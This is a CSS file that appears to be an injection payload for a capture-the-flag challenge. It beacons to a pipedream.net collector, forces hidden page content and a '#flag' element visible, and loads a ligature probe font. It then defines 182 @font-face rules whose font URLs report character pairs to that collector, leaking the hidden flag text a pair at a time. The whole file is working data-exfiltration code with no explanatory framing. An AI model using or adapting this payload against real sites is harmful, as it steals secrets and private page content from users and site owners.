/* Beacon */
body { background-image: url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=BEACON_LIG'); }

/* Bypass content-visibility */
#page { content-visibility: hidden; animation: unveil 0.001s 0.3s forwards; }
@keyframes unveil { to { content-visibility: visible; } }
#flag { display: block !important; }

/* Apply ligature probe font to flag */
@font-face {
  font-family: ligprobe;
  src: url('https://uh4ck3r.github.io/ctf/lig_probe.woff2');
}

@font-face{font-family:phE000;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Ba');unicode-range:U+E000}
@font-face{font-family:phE001;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Bb');unicode-range:U+E001}
@font-face{font-family:phE002;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Bj');unicode-range:U+E002}
@font-face{font-family:phE003;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Bp');unicode-range:U+E003}
@font-face{font-family:phE004;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Bs');unicode-range:U+E004}
@font-face{font-family:phE005;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7By');unicode-range:U+E005}
@font-face{font-family:phE006;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Bz');unicode-range:U+E006}
@font-face{font-family:phE007;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B0');unicode-range:U+E007}
@font-face{font-family:phE008;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B1');unicode-range:U+E008}
@font-face{font-family:phE009;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B4');unicode-range:U+E009}
@font-face{font-family:phE00A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B5');unicode-range:U+E00A}
@font-face{font-family:phE00B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B7');unicode-range:U+E00B}
@font-face{font-family:phE00C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7B%7D');unicode-range:U+E00C}
@font-face{font-family:phE00D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=aa');unicode-range:U+E00D}
@font-face{font-family:phE00E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ab');unicode-range:U+E00E}
@font-face{font-family:phE00F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=aj');unicode-range:U+E00F}
@font-face{font-family:phE010;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ap');unicode-range:U+E010}
@font-face{font-family:phE011;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=as');unicode-range:U+E011}
@font-face{font-family:phE012;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ay');unicode-range:U+E012}
@font-face{font-family:phE013;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=az');unicode-range:U+E013}
@font-face{font-family:phE014;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a0');unicode-range:U+E014}
@font-face{font-family:phE015;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a1');unicode-range:U+E015}
@font-face{font-family:phE016;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a4');unicode-range:U+E016}
@font-face{font-family:phE017;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a5');unicode-range:U+E017}
@font-face{font-family:phE018;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a7');unicode-range:U+E018}
@font-face{font-family:phE019;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=a%7D');unicode-range:U+E019}
@font-face{font-family:phE01A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ba');unicode-range:U+E01A}
@font-face{font-family:phE01B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=bb');unicode-range:U+E01B}
@font-face{font-family:phE01C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=bj');unicode-range:U+E01C}
@font-face{font-family:phE01D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=bp');unicode-range:U+E01D}
@font-face{font-family:phE01E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=bs');unicode-range:U+E01E}
@font-face{font-family:phE01F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=by');unicode-range:U+E01F}
@font-face{font-family:phE020;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=bz');unicode-range:U+E020}
@font-face{font-family:phE021;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b0');unicode-range:U+E021}
@font-face{font-family:phE022;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b1');unicode-range:U+E022}
@font-face{font-family:phE023;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b4');unicode-range:U+E023}
@font-face{font-family:phE024;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b5');unicode-range:U+E024}
@font-face{font-family:phE025;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b7');unicode-range:U+E025}
@font-face{font-family:phE026;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=b%7D');unicode-range:U+E026}
@font-face{font-family:phE027;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ja');unicode-range:U+E027}
@font-face{font-family:phE028;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=jb');unicode-range:U+E028}
@font-face{font-family:phE029;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=jj');unicode-range:U+E029}
@font-face{font-family:phE02A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=jp');unicode-range:U+E02A}
@font-face{font-family:phE02B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=js');unicode-range:U+E02B}
@font-face{font-family:phE02C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=jy');unicode-range:U+E02C}
@font-face{font-family:phE02D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=jz');unicode-range:U+E02D}
@font-face{font-family:phE02E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j0');unicode-range:U+E02E}
@font-face{font-family:phE02F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j1');unicode-range:U+E02F}
@font-face{font-family:phE030;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j4');unicode-range:U+E030}
@font-face{font-family:phE031;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j5');unicode-range:U+E031}
@font-face{font-family:phE032;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j7');unicode-range:U+E032}
@font-face{font-family:phE033;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=j%7D');unicode-range:U+E033}
@font-face{font-family:phE034;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=pa');unicode-range:U+E034}
@font-face{font-family:phE035;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=pb');unicode-range:U+E035}
@font-face{font-family:phE036;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=pj');unicode-range:U+E036}
@font-face{font-family:phE037;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=pp');unicode-range:U+E037}
@font-face{font-family:phE038;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ps');unicode-range:U+E038}
@font-face{font-family:phE039;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=py');unicode-range:U+E039}
@font-face{font-family:phE03A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=pz');unicode-range:U+E03A}
@font-face{font-family:phE03B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p0');unicode-range:U+E03B}
@font-face{font-family:phE03C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p1');unicode-range:U+E03C}
@font-face{font-family:phE03D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p4');unicode-range:U+E03D}
@font-face{font-family:phE03E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p5');unicode-range:U+E03E}
@font-face{font-family:phE03F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p7');unicode-range:U+E03F}
@font-face{font-family:phE040;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=p%7D');unicode-range:U+E040}
@font-face{font-family:phE041;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sa');unicode-range:U+E041}
@font-face{font-family:phE042;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sb');unicode-range:U+E042}
@font-face{font-family:phE043;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sj');unicode-range:U+E043}
@font-face{font-family:phE044;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sp');unicode-range:U+E044}
@font-face{font-family:phE045;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ss');unicode-range:U+E045}
@font-face{font-family:phE046;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sy');unicode-range:U+E046}
@font-face{font-family:phE047;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=sz');unicode-range:U+E047}
@font-face{font-family:phE048;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s0');unicode-range:U+E048}
@font-face{font-family:phE049;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s1');unicode-range:U+E049}
@font-face{font-family:phE04A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s4');unicode-range:U+E04A}
@font-face{font-family:phE04B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s5');unicode-range:U+E04B}
@font-face{font-family:phE04C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s7');unicode-range:U+E04C}
@font-face{font-family:phE04D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=s%7D');unicode-range:U+E04D}
@font-face{font-family:phE04E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ya');unicode-range:U+E04E}
@font-face{font-family:phE04F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=yb');unicode-range:U+E04F}
@font-face{font-family:phE050;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=yj');unicode-range:U+E050}
@font-face{font-family:phE051;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=yp');unicode-range:U+E051}
@font-face{font-family:phE052;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=ys');unicode-range:U+E052}
@font-face{font-family:phE053;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=yy');unicode-range:U+E053}
@font-face{font-family:phE054;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=yz');unicode-range:U+E054}
@font-face{font-family:phE055;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y0');unicode-range:U+E055}
@font-face{font-family:phE056;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y1');unicode-range:U+E056}
@font-face{font-family:phE057;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y4');unicode-range:U+E057}
@font-face{font-family:phE058;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y5');unicode-range:U+E058}
@font-face{font-family:phE059;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y7');unicode-range:U+E059}
@font-face{font-family:phE05A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=y%7D');unicode-range:U+E05A}
@font-face{font-family:phE05B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=za');unicode-range:U+E05B}
@font-face{font-family:phE05C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zb');unicode-range:U+E05C}
@font-face{font-family:phE05D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zj');unicode-range:U+E05D}
@font-face{font-family:phE05E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zp');unicode-range:U+E05E}
@font-face{font-family:phE05F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zs');unicode-range:U+E05F}
@font-face{font-family:phE060;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zy');unicode-range:U+E060}
@font-face{font-family:phE061;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=zz');unicode-range:U+E061}
@font-face{font-family:phE062;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z0');unicode-range:U+E062}
@font-face{font-family:phE063;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z1');unicode-range:U+E063}
@font-face{font-family:phE064;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z4');unicode-range:U+E064}
@font-face{font-family:phE065;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z5');unicode-range:U+E065}
@font-face{font-family:phE066;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z7');unicode-range:U+E066}
@font-face{font-family:phE067;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=z%7D');unicode-range:U+E067}
@font-face{font-family:phE068;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0a');unicode-range:U+E068}
@font-face{font-family:phE069;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0b');unicode-range:U+E069}
@font-face{font-family:phE06A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0j');unicode-range:U+E06A}
@font-face{font-family:phE06B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0p');unicode-range:U+E06B}
@font-face{font-family:phE06C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0s');unicode-range:U+E06C}
@font-face{font-family:phE06D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0y');unicode-range:U+E06D}
@font-face{font-family:phE06E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0z');unicode-range:U+E06E}
@font-face{font-family:phE06F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=00');unicode-range:U+E06F}
@font-face{font-family:phE070;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=01');unicode-range:U+E070}
@font-face{font-family:phE071;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=04');unicode-range:U+E071}
@font-face{font-family:phE072;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=05');unicode-range:U+E072}
@font-face{font-family:phE073;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=07');unicode-range:U+E073}
@font-face{font-family:phE074;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=0%7D');unicode-range:U+E074}
@font-face{font-family:phE075;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1a');unicode-range:U+E075}
@font-face{font-family:phE076;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1b');unicode-range:U+E076}
@font-face{font-family:phE077;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1j');unicode-range:U+E077}
@font-face{font-family:phE078;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1p');unicode-range:U+E078}
@font-face{font-family:phE079;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1s');unicode-range:U+E079}
@font-face{font-family:phE07A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1y');unicode-range:U+E07A}
@font-face{font-family:phE07B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1z');unicode-range:U+E07B}
@font-face{font-family:phE07C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=10');unicode-range:U+E07C}
@font-face{font-family:phE07D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=11');unicode-range:U+E07D}
@font-face{font-family:phE07E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=14');unicode-range:U+E07E}
@font-face{font-family:phE07F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=15');unicode-range:U+E07F}
@font-face{font-family:phE080;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=17');unicode-range:U+E080}
@font-face{font-family:phE081;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=1%7D');unicode-range:U+E081}
@font-face{font-family:phE082;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4a');unicode-range:U+E082}
@font-face{font-family:phE083;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4b');unicode-range:U+E083}
@font-face{font-family:phE084;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4j');unicode-range:U+E084}
@font-face{font-family:phE085;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4p');unicode-range:U+E085}
@font-face{font-family:phE086;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4s');unicode-range:U+E086}
@font-face{font-family:phE087;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4y');unicode-range:U+E087}
@font-face{font-family:phE088;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4z');unicode-range:U+E088}
@font-face{font-family:phE089;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=40');unicode-range:U+E089}
@font-face{font-family:phE08A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=41');unicode-range:U+E08A}
@font-face{font-family:phE08B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=44');unicode-range:U+E08B}
@font-face{font-family:phE08C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=45');unicode-range:U+E08C}
@font-face{font-family:phE08D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=47');unicode-range:U+E08D}
@font-face{font-family:phE08E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=4%7D');unicode-range:U+E08E}
@font-face{font-family:phE08F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5a');unicode-range:U+E08F}
@font-face{font-family:phE090;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5b');unicode-range:U+E090}
@font-face{font-family:phE091;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5j');unicode-range:U+E091}
@font-face{font-family:phE092;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5p');unicode-range:U+E092}
@font-face{font-family:phE093;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5s');unicode-range:U+E093}
@font-face{font-family:phE094;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5y');unicode-range:U+E094}
@font-face{font-family:phE095;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5z');unicode-range:U+E095}
@font-face{font-family:phE096;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=50');unicode-range:U+E096}
@font-face{font-family:phE097;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=51');unicode-range:U+E097}
@font-face{font-family:phE098;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=54');unicode-range:U+E098}
@font-face{font-family:phE099;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=55');unicode-range:U+E099}
@font-face{font-family:phE09A;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=57');unicode-range:U+E09A}
@font-face{font-family:phE09B;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=5%7D');unicode-range:U+E09B}
@font-face{font-family:phE09C;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7a');unicode-range:U+E09C}
@font-face{font-family:phE09D;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7b');unicode-range:U+E09D}
@font-face{font-family:phE09E;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7j');unicode-range:U+E09E}
@font-face{font-family:phE09F;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7p');unicode-range:U+E09F}
@font-face{font-family:phE0A0;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7s');unicode-range:U+E0A0}
@font-face{font-family:phE0A1;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7y');unicode-range:U+E0A1}
@font-face{font-family:phE0A2;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7z');unicode-range:U+E0A2}
@font-face{font-family:phE0A3;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=70');unicode-range:U+E0A3}
@font-face{font-family:phE0A4;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=71');unicode-range:U+E0A4}
@font-face{font-family:phE0A5;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=74');unicode-range:U+E0A5}
@font-face{font-family:phE0A6;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=75');unicode-range:U+E0A6}
@font-face{font-family:phE0A7;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=77');unicode-range:U+E0A7}
@font-face{font-family:phE0A8;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=7%7D');unicode-range:U+E0A8}
@font-face{font-family:phE0A9;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Da');unicode-range:U+E0A9}
@font-face{font-family:phE0AA;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Db');unicode-range:U+E0AA}
@font-face{font-family:phE0AB;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Dj');unicode-range:U+E0AB}
@font-face{font-family:phE0AC;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Dp');unicode-range:U+E0AC}
@font-face{font-family:phE0AD;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Ds');unicode-range:U+E0AD}
@font-face{font-family:phE0AE;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Dy');unicode-range:U+E0AE}
@font-face{font-family:phE0AF;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7Dz');unicode-range:U+E0AF}
@font-face{font-family:phE0B0;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D0');unicode-range:U+E0B0}
@font-face{font-family:phE0B1;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D1');unicode-range:U+E0B1}
@font-face{font-family:phE0B2;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D4');unicode-range:U+E0B2}
@font-face{font-family:phE0B3;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D5');unicode-range:U+E0B3}
@font-face{font-family:phE0B4;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D7');unicode-range:U+E0B4}
@font-face{font-family:phE0B5;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?pair=%7D%7D');unicode-range:U+E0B5}

#flag { font-family: ligprobe, phE000, phE001, phE002, phE003, phE004, phE005, phE006, phE007, phE008, phE009, phE00A, phE00B, phE00C, phE00D, phE00E, phE00F, phE010, phE011, phE012, phE013, phE014, phE015, phE016, phE017, phE018, phE019, phE01A, phE01B, phE01C, phE01D, phE01E, phE01F, phE020, phE021, phE022, phE023, phE024, phE025, phE026, phE027, phE028, phE029, phE02A, phE02B, phE02C, phE02D, phE02E, phE02F, phE030, phE031, phE032, phE033, phE034, phE035, phE036, phE037, phE038, phE039, phE03A, phE03B, phE03C, phE03D, phE03E, phE03F, phE040, phE041, phE042, phE043, phE044, phE045, phE046, phE047, phE048, phE049, phE04A, phE04B, phE04C, phE04D, phE04E, phE04F, phE050, phE051, phE052, phE053, phE054, phE055, phE056, phE057, phE058, phE059, phE05A, phE05B, phE05C, phE05D, phE05E, phE05F, phE060, phE061, phE062, phE063, phE064, phE065, phE066, phE067, phE068, phE069, phE06A, phE06B, phE06C, phE06D, phE06E, phE06F, phE070, phE071, phE072, phE073, phE074, phE075, phE076, phE077, phE078, phE079, phE07A, phE07B, phE07C, phE07D, phE07E, phE07F, phE080, phE081, phE082, phE083, phE084, phE085, phE086, phE087, phE088, phE089, phE08A, phE08B, phE08C, phE08D, phE08E, phE08F, phE090, phE091, phE092, phE093, phE094, phE095, phE096, phE097, phE098, phE099, phE09A, phE09B, phE09C, phE09D, phE09E, phE09F, phE0A0, phE0A1, phE0A2, phE0A3, phE0A4, phE0A5, phE0A6, phE0A7, phE0A8, phE0A9, phE0AA, phE0AB, phE0AC, phE0AD, phE0AE, phE0AF, phE0B0, phE0B1, phE0B2, phE0B3, phE0B4, phE0B5, monospace; }
/* Total @font-face: 182 pairs */
